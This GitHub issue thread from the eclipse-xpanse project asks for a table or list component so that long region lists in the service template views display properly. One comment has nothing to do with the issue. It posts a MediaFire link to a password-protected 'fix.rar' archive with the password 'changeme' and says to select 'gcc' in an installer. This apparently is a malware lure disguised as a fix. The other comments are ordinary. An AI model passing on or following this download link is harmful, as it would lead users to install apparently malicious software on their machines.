### ISSUE TITLE
change display component of the region in the service template details

### ISSUE THREAD

**Issue by swaroopar** [eclipse-xpanse/xpanse#1903]
with #1890 we introduced  ´site´ information in the region. With this the length of data within every region is too big. So the current implementation must changed so that the UI works even if there is a long list of supported regions for a service template. 

- [ ] Consider using table or list antd component. 
- [ ] Important is that even bigger lists are handled correctly. 
- [ ] Change to all views -> register panel, ISV and CSP.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Alice1319** [comment]
I‘ll take this.
